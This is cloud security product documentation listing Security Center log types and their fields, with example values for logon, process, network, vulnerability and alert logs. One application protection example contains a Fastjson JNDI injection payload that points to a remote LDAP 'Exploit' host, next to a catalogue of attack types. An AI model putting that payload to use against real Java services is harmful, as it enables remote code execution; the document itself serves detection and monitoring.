Security Center:Log types and fields

Editions

Supported log types

Anti-virus, Advanced, Enterprise, and Ultimate

• Host logs

  • Logon logs

  • Network connection logs

  • Process startup logs

  • Brute-force attack logs

  • Account snapshot logs (only Enterprise and Ultimate support)

  • Network snapshot logs (only Enterprise and Ultimate support)

  • Process snapshot logs (only Enterprise and Ultimate support)

  • DNS request logs

  • Agent event logs

• Security logs

  • Security alert logs

  • Core file monitoring logs (only Enterprise and Ultimate support)

  • Vulnerability logs

  • Network defense logs

  • Cloud security posture management (CSPM)-baseline check logs (Anti-virus does not support)

Basic

• Host logs

  • Agent event logs

• Security logs

  • Vulnerability logs (only records vulnerabilities supported by the Basic edition)

  • Security alert logs (only records alerts supported by the Basic edition)

Log type

__topic__

Description

Collection cycle

Logon logs

aegis-log-login

Records logs of user logins to servers, including login time, login user, login method, login IP address, and other information.

Logon logs help you monitor user activities, promptly identify and respond to abnormal behaviors, thereby ensuring system security.

Real-time collection.

Network connection logs

aegis-log-network

Records logs of network connection activities, including server connection 5-tuple, connection time, connection status, and other information.

Network connection logs help you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, etc.

Real-time collection.

Process startup logs

aegis-log-process

Records logs related to process startup on the server, including process startup time, startup command, and parameters.

By recording and analyzing process startup logs, you can understand the startup status and configuration information of processes in the system, detect abnormal process activities, malware intrusions, security threats, and other issues.

Real-time collection, process startup is reported immediately.

Brute-force attack logs

aegis-log-crack

Records logs of brute-force attack behaviors, including attempts to log in and crack systems, applications, or accounts.

By recording and analyzing brute-force attack logs, you can understand the brute-force attacks on systems or applications, detect abnormal login attempts, weak passwords, and credential leaks. Brute-force attack logs can also be used to track malicious users and conduct forensic analysis, assisting security teams in incident response and investigation.

Real-time collection.

Account snapshot logs

aegis-snapshot-host

Records logs of detailed user account information in systems or applications, including basic account attributes such as username, password policy, login history, etc.

By comparing account snapshot logs at different time points, you can understand the changes and evolution of user accounts and promptly detect potential account security issues, such as unauthorized account access, abnormal account status, etc.

• When you set up periodic automatic collection using the Asset Fingerprints feature, collection is performed automatically according to the set cycle. If periodic automatic collection is not set, the system performs collection once a day.

• Manual collection of asset fingerprint data.

Network snapshot logs

aegis-snapshot-port

Records logs of network connections, including 5-tuple, connection status, and associated process information fields.

By recording and analyzing network connection snapshot logs, you can understand the active network sockets in the system, helping you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, etc.

Process snapshot logs

aegis-snapshot-process

Records logs of process activities in the system, including process ID, process name, process startup time, and other information.

By recording and analyzing process snapshot logs, you can understand the activity status and resource usage of processes in the system, detect abnormal processes, CPU usage, memory leaks, and other issues.

DNS request logs

aegis-log-dns-query

Records logs of DNS query requests, including detailed information about DNS query requests sent by the server, such as the queried domain name, query type, query source, and other information.

By analyzing DNS request logs, you can understand DNS query activities in the network, detect abnormal query behaviors, domain hijacking, DNS poisoning, and other issues.

Real-time collection.

Agent event logs

aegis-log-client

Records the online and offline events of Security Center agents.

Real-time collection.

Log type

__topic__

Description

Collection cycle

Vulnerability logs

sas-vul-log

Records logs of vulnerability-related information found in systems or applications, including vulnerability name, vulnerability status, handling actions, and other information.

By recording and analyzing vulnerability logs, you can understand the vulnerabilities in the system, security risks, and attack trends, and take appropriate remedial measures in a timely manner.

Real-time collection.

CSPM-baseline logs

sas-hc-log

Records logs of baseline risk check results, including baseline level, baseline category, risk level, and other information.

By recording and analyzing baseline risk logs, you can understand the baseline security status and potential risks of the system.

Security alert logs

sas-security-log

Records logs of security events and alert information that occur in systems or applications, including alert data source, alert details, alert level, and other information.

By recording and analyzing security alert logs, you can understand the security events and threats in the system and take appropriate response measures in a timely manner.

CSPM - Cloud platform configuration check logs

sas-cspm-log

Records logs related to cloud security posture management, including check results, whitelist operations, and other information from cloud security posture management.

By recording and analyzing cloud security posture management logs, you can understand the configuration issues and potential security risks in the cloud platform.

Network defense logs

sas-net-block

Records logs of network attack events, including attack type, source IP address, target IP address, and other key information.

By recording and analyzing network defense logs, you can understand the security events occurring in the network, and then take appropriate response and defense measures to improve the security and reliability of the network.

Application protection logs

sas-rasp-log

Records logs of attack alert information from the application protection feature, including attack type, behavioral data, attacker IP, and other key information.

By recording and analyzing application protection alert logs, you can understand the security events occurring in the application, and then take appropriate response and defense measures to improve the security and reliability of the application.

Malicious file detection logs

sas-filedetect-log

Records logs of malicious file detection using the malicious file detection SDK feature, including file information, detection scenario, detection results, and other information for malicious file detection.

By recording and analyzing malicious file detection logs, you can identify common viruses in offline files and Alibaba Cloud OSS files, such as ransomware, mining programs, etc., and handle them promptly to prevent the spread and execution of malicious files.

Core file monitoring event logs

aegis-file-protect-log

Records alert events detected using the core file monitoring feature, including file path, operations performed on the file, alert level, and other information.

By recording and analyzing core file monitoring event logs, you can monitor whether core files are stolen or tampered with.

Agentless detection logs

sas-agentless-log

Records security risks detected in Elastic Compute Service (ECS), and images using the agentless detection feature, including vulnerabilities, baselines, malicious samples, and sensitive files.

By recording and analyzing agentless detection logs, you can view the security risks in assets during different time periods, helping you identify and address potential threats.

Field name

Description

Example

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

sas_group_name

The asset group to which the server belongs in Security Center.

default

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

src_ip

The IP address that is used to log on to the server.

221.11.XX.XX

dst_port

The port that is used to log on to the server.

22

login_type

The logon type. Valid values include the following values:

• SSHLOGIN and SSH: SSH logon

• RDPLOGIN: remote desktop logon

• IPCLOGIN: IPC connection logon

SSH

username

The username that is used for logon.

admin

login_count

The number of logon attempts.

The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the login_count field is 3, 3 logon attempts were made within 1 minute.

3

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

cmd_chain

The process chain.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

The index of the process chain. You can use an index to search for a process chain.

B184

container_hostname

The name of the server in the container.

nginx-ingress-controller-765f67fd4d-****

container_id

The container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

The image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

The name of the container.

nginx-ingress-****

container_pid

The ID of the process in the container.

0

net_connect_dir

The direction of the network connection. Valid values:

• in

• out

in

dst_ip

The destination IP address.

• If the value of dir is out, the value of this field is the IP address of the peer host.

• If the value of dir is in, the value of this field is the IP address of your host.

192.168.XX.XX

dst_port

The destination port.

443

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

parent_proc_name

The name of the parent process file.

/usr/bin/bash

pid

The ID of the process.

14275

ppid

The parent process ID.

14268

proc_name

The name of the process.

nginx

proc_path

The path to the process.

/usr/local/nginx/sbin/nginx

proc_start_time

The time when the process was started.

N/A

connection_type

The protocol. Valid values:

• tcp

• raw, which indicates raw socket

tcp

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

srv_comm

The command name associated with the parent process of the parent process.

containerd-shim

status

The status of the network connection. Valid values:

• 1: The connection is closed.

• 2: The connection is to be established.

• 3: The SYN packet is sent.

• 4: The SYN packet is received.

• 5: The connection is established.

• 6: The connection is waiting to be closed.

• 7: The connection is being closed.

• 8: The local endpoint is waiting for an acknowledgment of the connection termination request from the peer endpoint.

• 9: The local endpoint is waiting for a connection termination request from the peer endpoint after it has received the acknowledgment from the peer endpoint.

• 10: The local endpoint is waiting for enough time to elapse to ensure that the peer endpoint receives the acknowledgment from the local endpoint.

• 11: The TCB for the connection is deleted.

5

type

The type of the real-time network connection. Valid values:

• connect: TCP connection initiated

• accept: TCP connection received

• listen: port listening

listen

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server that is under a brute-force attack.

192.168.XX.XX

sas_group_name

The asset group to which the server belongs in Security Center.

default

uuid

The UUID of the server that is under a brute-force attack.

5d83b26b-b7ca-4a0a-9267-12*****

login_count

The number of failed logon attempts.

The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the warn_count field is 3, three logon attempts were made within 1 minute.

3

src_ip

The source IP address.

47.92.XX.XX

dst_port

The logon port.

22

login_type

The logon type. Valid values:

• SSHLOGIN and SSH: SSH logon

• RDPLOGIN: remote desktop logon

• IPCLOGIN: IPC connection logon

SSH

username

The username that is used for logon.

user

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

account_expire

The date when the account expires. The value never indicates that the account never expires.

never

domain

The domain or directory to which the account belongs. The value N/A indicates that the account does not belong to a domain.

N/A

groups

The group to which the account belongs. The value N/A indicates that the account does not belong to a group.

["nscd"]

home_dir

The home directory, which is the default directory to store and manage files in the system.

/Users/abc

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

last_chg

The date when the password was last changed.

2022-11-29

last_logon

The date and time of the last logon that is initiated by using the account. The value N/A indicates that the account has not been used for logons.

2023-08-18 09:21:21

login_ip

The IP address from which the last remote logon was initiated by using the account. The value N/A indicates that the account has not been used for logons.

192.168.XX.XX

passwd_expire

The date when the password expires. The value never indicates that the password never expires.

2024-08-24

perm

Indicates whether the account has root permissions. Valid values:

• 0: no

• 1: yes

0

sas_group_name

The asset group to which the server belongs in Security Center.

default

shell

The Linux shell command.

/sbin/nologin

status

The status of the account. Valid values:

• 0: Logons from the account are not allowed.

• 1: Logons from the account are allowed.

0

tty

The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons.

N/A

username

The name of the user.

nscd

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

warn_time

The date when you are notified of expiring passwords. The value never indicates that no notifications are sent.

2024-08-20

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

net_connect_dir

The direction of the network connection. Valid values:

• in

• out

in

dst_ip

The destination IP address.

• If the value of dir is out, the value of this field is the IP address of the peer host.

• If the value of dir is in, the value of this field is the IP address of your host.

192.168.XX.XX

dst_port

The destination port.

443

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

pid

The ID of the process.

682

proc_name

The name of the process.

sshd

connection_type

The protocol. Valid values:

• tcp4: TCP connections over IPv4 addresses

• tcp6: TCP connections over IPv6 addresses

tcp4

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

status

The status of the network connection. Valid values:

• 1: The connection is closed.

• 2: The connection is to be established.

• 3: The SYN packet is sent.

• 4: The SYN packet is received.

• 5: The connection is established.

• 6: The connection is waiting to be closed.

• 7: The connection is being closed.

• 8: The local endpoint is waiting for an acknowledgment of the connection termination request from the peer endpoint.

• 9: The local endpoint is waiting for a connection termination request from the peer endpoint after it has received the acknowledgment from the peer endpoint.

• 10: The local endpoint is waiting for enough time to elapse to ensure that the peer endpoint receives the acknowledgment from the local endpoint.

• 11: The TCB for the connection is deleted.

5

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

cmdline

The complete command to start the process.

/usr/local/share/assist-daemon/assist_daemon

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

md5

The MD5 hash value of the binary file.

1086e731640751c9802c19a7f53a64f5

proc_name

The name of the process file.

assist_daemon

proc_path

The full path to the process file.

/usr/local/share/assist-daemon/assist_daemon

pid

The ID of the process.

1692

pname

The name of the parent process file.

systemd

sas_group_name

The asset group to which the server belongs in Security Center.

default

proc_start_time

The time when the process started. This is a built-in field.

2023-08-18 20:00:12

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

domain

The domain name that is included in the DNS request.

example.aliyundoc.com

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server that initiates the DNS request.

192.168.XX.XX

pid

The ID of the process that initiates the DNS request.

3544

ppid

The ID of the parent process that initiates the DNS request.

3408

cmd_chain

The chain of the process that initiates the DNS request.

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

The command line of the process that initiates the DNS request.

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

The path to the process that initiates the DNS request.

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

The asset group to which the server belongs in Security Center.

default

time

The time when the DNS request is captured. In most cases, the value is the point in time when the DNS request is initiated.

2023-08-17 20:05:04

uuid

The UUID of the server that initiates the DNS request.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

host_ip

The IP address of the server.

192.168.XX.XX

agent_version

The version of the Security Center agent.

aegis_11_91

last_login

The timestamp of the last logon. Unit: milliseconds.

1716444387617

platform

The type of the operating system. Valid values:

• windows

• linux

linux

region_id

The ID of the region in which the server resides.

cn-beijing

status

The status of the Security Center agent. Valid values:

• online

• offline

online

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

vul_alias_name

The alias of the vulnerability.

CESA-2023:1335: openssl Security Update

risk_level

The risk level. Valid values:

• asap: high

• later: medium

• nntf: low

later

extend_content

The extended information about the vulnerability.

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the host.

39.104.XX.XX

intranet_ip

The private IP address of the host.

192.168.XX.XX

instance_name

The name of the host.

hhht-linux-***

vul_name

The name of the vulnerability.

centos:7:cesa-2023:1335

operation

The operation on the vulnerability. Valid values:

• new

• verify

• fix

new

status

The status information. Valid values:

• 1: unfixed

• 2: fix failed

• 3: rollback failed

• 4: fixing

• 5: rolling back

• 6: verifying

• 7: fixed

• 8: fixed and pending restart

• 9: rolled back

• 10: ignored

• 11: rolled back and pending restart

• 12: no longer exists

• 13: expired

1

tag

The tag that is added to the vulnerability. Valid values:

• oval: Linux software vulnerability

• system: Windows system vulnerability

• cms: Web-CMS vulnerability

  Note

  A random string indicates other types of vulnerabilities.

oval

type

The type of the vulnerability. Valid values:

• sys: Windows system vulnerability

• cve: Linux software vulnerability

• cms: Web-CMS vulnerability

• emg: urgent vulnerability

sys

uuid

The UUID of the server.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

check_item_name

The name of the check item.

Set the shortest interval between password changes

check_item_level

The risk level of the baseline. Valid values:

• high

• medium

• low

medium

check_type

The type of the check item.

Identity authentication

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

risk_level

The severity of the risk item. Valid values:

• high

• medium

• low

medium

operation

The operation. Valid values:

• new

• verity

new

risk_name

The name of the risk item.

Password compliance check

sas_group_name

The server group to which the server belongs in Security Center. The risk item is detected on the server.

default

status

The status information. Valid values:

• 1: unfixed

• 2: fix failed

• 3: rollback failed

• 4: fixing

• 5: rolling back

• 6: verifying

• 7: fixed

• 8: fixed and pending restart

• 9: rolled back

• 10: ignored

• 11: rolled back and pending restart

• 12: no longer exists

• 13: expired

1

sub_type_alias_name

The alias of the subtype in Chinese.

Internationally Agreed Best Practices for Security - Ubuntu 16/18/20/22 Security Baseline Check

sub_type_name

The name of the subtype. For more information about baseline subtypes, see Baseline types and subtypes.

hc_ubuntu16_cis_rules

type_alias_name

The alias of the check type in Chinese.

Internationally Agreed Best Practices for Security

type_name

The type of the baseline. For more information about baseline types, see Baseline types and subtypes.

cis

uuid

The UUID of the server on which the risk item is detected.

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

data_source

The data source. Valid values:

• aegis_suspicious_event: host exceptions

• aegis_suspicious_file_v2: webshells

• aegis_login_log: unusual logons

• honeypot: alert events generated by cloud honeypots

• object_scan: file detection exceptions

• security_event: Security Center exceptions

• sas_ak_leak: AccessKey pair leaks

aegis_login_log

detail

The details of the alert.

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Logon to an ECS instance by using an unusual account","status":0}

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the host.

39.104.XX.XX

intranet_ip

The private IP address of the host.

192.168.XX.XX

level

The risk level of the alert. Valid values:

• serious

• suspicious

• remind

suspicious

name

The name of the alert.

Unusual logon - Logon to an ECS instance by using an unusual account

operation

The operation. Valid values:

• new

• dealing

• update

new

status

The status of the alert. Valid values:

• 0: all

• 1: pending handling

• 2: ignored

• 4: confirmed

• 8: marked as a false positive

• 16: being handled

• 32: handled

• 64: expired

• 128: deleted

• 512: being automatically blocked

• 513: automatically blocked

1

unique_info

The UUID of the alert.

2536dd765f804916a1fa3b9516b5****

uuid

The UUID of the server on which the alert is generated.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

check_id

The ID of the check item. You can call the ListCheckResult operation to query the IDs of check items. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services.

11

check_item_name

The name of the check item.

Back-to-origin settings

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

instance_name

The name of the instance.

lsm

instance_result

The impacts of risks. The value is a JSON string.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

The subtype of the instance. Valid values:

• If the type of the instance is ECS, the following valid values are supported:

  • INSTANCE

  • DISK

  • SECURITY_GROUP

• If the type of the instance is Container Registry, the following valid values are supported:

  • REPOSITORY_ENTERPRISE

  • REPOSITORY_PERSON

• If the type of the instance is Resource Access Management (RAM), the following valid values are supported:

  • ALIAS

  • USER

  • POLICY

  • GROUP

• If the type of the instance is Web Application Firewall (WAF), the value is fixed as DOMAIN.

• If the type of the instance is other values, the value is fixed as INSTANCE.

INSTANCE

instance_type

The type of the instance. Valid values:

• ECS

• SLB

• RDS: ApsaraDB RDS

• MONGODB: ApsaraDB for MongoDB

• KVSTORE: ApsaraDB for Redis

• ACR: Container Registry

• CSK: Container Service for Kubernetes (ACK)

• VPC: Virtual Private Cloud (VPC)

• ACTIONTRAIL: ActionTrail

• CDN: Alibaba Cloud CDN (CDN)

• CAS: Certificate Management Service (formerly SSL Certificates Service)

• RDC: Apsara Devops

• RAM

• DDOS: Anti-DDoS Proxy

• WAF

• OSS

• POLARDB: PolarDB

• POSTGRESQL: ApsaraDB RDS for PostgreSQL

• MSE: Microservices Engine (MSE)

• NAS: File Storage NAS (NAS)

• SDDP: Sensitive Data Discovery and Protection (SDDP)

• EIP: Elastic IP Address (EIP)

ECS

region_id

The region ID of the instance.

cn-hangzhou

requirement_id

The requirement item ID. You can call the ListCheckStandard operation to query the IDs of requirement items. The operation is used to query the standards of configuration checks.

5

risk_level

The risk level. Valid values:

• LOW

• MEDIUM

• HIGH

MEDIUM

section_id

The section ID. You can call the ListCheckResult operation to query section IDs.

1

standard_id

The standard ID. You can call the ListCheckStandard operation to query standard IDs.

1

status

The status of the check item. Valid values:

• NOT_CHECK: The check item is not checked.

• CHECKING: The check item is being checked.

• PASS: The check item passed the check.

• NOT_PASS: The check item failed the check.

• WHITELIST: The check item is added to the whitelist.

PASS

vendor

The cloud service provider. The value is fixed as ALIYUN.

ALIYUN

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

cmd

The command line of the attacked process.

nginx: master process nginx

cur_time

The time when the attack event occurred.

2023-09-14 09:21:59

decode_payload

The decoded hexadecimal payload.

POST /Services/FileService/UserFiles/

dst_ip

The IP address of the attacked asset.

172.16.XX.XX

dst_port

The port of the attacked asset.

80

func

The type of the blocked event. Valid values: Valid values:

• payload: indicates that an event is blocked when malicious data or instructions are detected.

• tuple: indicates that an event is blocked when malicious IP addresses are detected.

payload

rule_type

The type of the rule that is used in the blocked event. Valid values:

• alinet_payload: indicates a payload defense rule that is specified in Security Center.

• alinet_tuple: indicates a tuple defense rule that is specified in Security Center.

alinet_payload

instance_id

The instance ID of the attacked asset.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the attacked asset.

39.104.XX.XX

intranet_ip

The private IP address of the attacked asset.

192.168.XX.XX

final_action

The defense action. The value is fixed as block. The value indicates that the attack is blocked.

block

payload

The hexadecimal payload.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

The ID of the attacked process.

7107

platform

The type of the operating system of the attacked asset. Valid values:

• windows

• linux

linux

proc_path

The path to the attacked process.

/usr/sbin/nginx

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address of the attack.

106.11.XX.XX

src_port

The source port of the attack.

29575

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

app_dir

The directory in which the application is stored.

/usr/local/aegis/rasp/apps/1111

app_id

The ID of the application.

6492a391fc9b4e2aad94****

app_name

The name of the application.

test

confidence_level

The confidence level of the detection algorithm. Valid values:

• high

• medium

• low

low

request_body

The information about the request body.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

The length of the request body.

112

data

The hook.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

The information about the request header.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

The name of the host or network device.

testhostname

host_ip

The private IP address of the host.

172.16.XX.XX

is_cliped

Indicates whether the log is truncated due to an excessive length. Valid values:

• true

• false

false

jdk_version

The JDK version.

1.8.0_292

message

The description of the alert.

Unsafe class serial.

request_method

The request method.

Post

platform

The type of the operating system.

Linux

arch

The architecture of the operating system.

amd64

kernel_version

The kernel version of the operating system.

3.10.0-1160.59.1.el7.x86_64

param

The request parameter. In most cases, the parameter is in one of the following formats:

• GET parameter

• application/x-www-form-urlencoded

{"url":["http://127.0.0.1.xip.io"]}

payload

The attack payload.

bash -c kill -0 -- -'31098'

payload_length

The length of the attack payload.

27

rasp_id

The ID of the Runtime Application Self Protection (RASP) agent.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

The version of the RASP agent.

0.8.5

src_ip

The IP address from which the request is initiated.

172.0.XX.XX

final_action

The handling result of the alert. Valid values:

• block

• monitor

block

rule_action

The alert handling action that is specified in the application protection rule. Valid values:

• block

• monitor

block

risk_level

The risk level. Valid values:

• high

• medium

• low

high

stacktrace

The stack information.

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

The time when the alert was generated.

2023-10-09 15:19:15

timestamp

The timestamp when the alert was generated. Unit: milliseconds.

1696835955070

type

The type of the attack. Valid values:

• attach: malicious Attach API

• beans: malicious beans binding

• classloader: malicious class loading

• dangerous_protocol: usage of vulnerable protocols

• dns: malicious DNS query

• engine: engine injection

• expression: expression injection

• file: malicious file read and write

• file_delete: arbitrary file deletion

• file_list: directory traversal

• file_read: arbitrary file read

• file_upload: malicious file upload

• jndi: Java Naming and Directory Interface (JNDI) injection

• jni: Java Native Interface (JNI) injection

• jstl: JavaServer Pages Standard Tag Library (JSTL) arbitrary file inclusion

• memory_shell: in-memory webshell injection

• rce: command execution

• read_object: deserialization attack

• reflect: malicious reflection call

• sql: SQL injection

• ssrf: malicious external connection

• thread_inject: thread injection

• xxe: XML external entity (XXE) attack

rce

url

The request URL.

http://127.0.0.1:999/xxx

rasp_attack_uuid

The UUID of the attack.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

The UUID of the host.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

The public IP address of the host.

1.2.XX.XX

intranet_ip

The private IP address of the host.

172.16.XX.XX

sas_group_name

The group to which the server belongs in Security Center.

Group 1

instance_id

The instance ID of the host.

i-wz995eivg28f1m**

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

bucket_name

The name of the OSS bucket.

***-test

event_id

The ID of the alert.

802210

event_name

The name of the alert.

Mining program

md5

The MD5 hash value of the file.

6bc2bc******53d409b1

sha256

The SHA-256 hash value of the file.

f038f9525******7772981e87f85

result

The detection result. Valid values:

• 0: No malicious file is detected.

• 1: Malicious files are detected.

0

file_path

The path to the file.

test.zip/bin_test

etag

The ID of the OSS object.

6BC2B******853D409B1

risk_level

The risk level. Valid values:

• serious

• suspicious

• remind

remind

source

The check method. Valid values:

• OSS: Objects in OSS buckets are checked in the Security Center console.

• API: SDK for Java or Python is used to detect malicious files.

OSS

parent_md5

The MD5 hash value of the parent file or the compressed package file.

3d0f8045bb9******

parent_sha256

The SHA-256 hash value of the parent file or the compressed package file.

69b643d6******a3fb859fa

parent_file_path

The name of the parent file or the compressed package file.

test.zip

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

start_time

The timestamp when the event last happened. Unit: seconds.

1718678414

uuid

The UUID of the server.

5d83b26b-b**a-4**a-9267-12****

file_path

The path to the file.

/etc/passwd

proc_path

The path to the process.

/usr/bin/bash

rule_id

The ID of the hit rule.

123

rule_name

The name of the rule.

file_test_rule

cmdline

The command line.

bash /opt/a

operation

The operation that you want to perform on the file.

READ

risk_level

The risk level.

2

pid

The process ID.

45324

proc_permission

The permissions to run the process.

rwxrwxrwx

instance_id

The instance ID.

i-wz995eivg2****

internet_ip

The IP address.

192.0.2.1

intranet_ip

The private IP address.

172.16.0.1

instance_name

The instance name.

aegis-test

platform

The operating system type.

Linux

Type

Subtype

Description

hc_exploit

hc_exploit_redis

High risk exploit-Redis unauthorized access high exploit vulnerability risk

hc_exploit_activemq

High risk exploit-ActiveMQ unauthorized access high exploit vulnerability risk

hc_exploit_couchdb

High risk exploit - CouchDB unauthorized access high exploit risk

hc_exploit_docker

High risk exploit - Docker unauthorized access high vulnerability risk

hc_exploit_es

High risk exploit - Elasticsearch unauthorized access high exploit vulnerability risk

hc_exploit_hadoop

High risk exploit - Hadoop unauthorized access high exploit vulnerability risk

hc_exploit_jboss

High risk exploit - Jboss unauthorized access high exploit vulnerability risk

hc_exploit_jenkins

High risk exploit - Jenkins unauthorized access high exploit vulnerability risk

hc_exploit_k8s_api

High risk exploit - Kubernetes Apiserver unauthorized access high exploit vulnerability risk

hc_exploit_ldap

High risk exploit - LDAP unauthorized access high exploit vulnerability risk (Windows)

hc_exploit_ldap_linux

High risk exploit-OpenLDAP unauthorized access vulnerability baseline (Linux)

hc_exploit_memcache

High risk exploit - Memcached unauthorized access high exploit vulnerability risk

hc_exploit_mongo

High risk exploit - Mongodb unauthorized access high exploit vulnerability risk

hc_exploit_pgsql

High risk exploit-Postgresql unauthorized access to high-risk risk baseline

hc_exploit_rabbitmq

High risk exploit-RabbitMQ unauthorized access high exploit vulnerability risk

hc_exploit_rsync

High risk exploit - rsync unauthorized access high exploit vulnerability risk

hc_exploit_tomcat

High risk exploit - Apache Tomcat AJP File Read/Inclusion Vulnerability

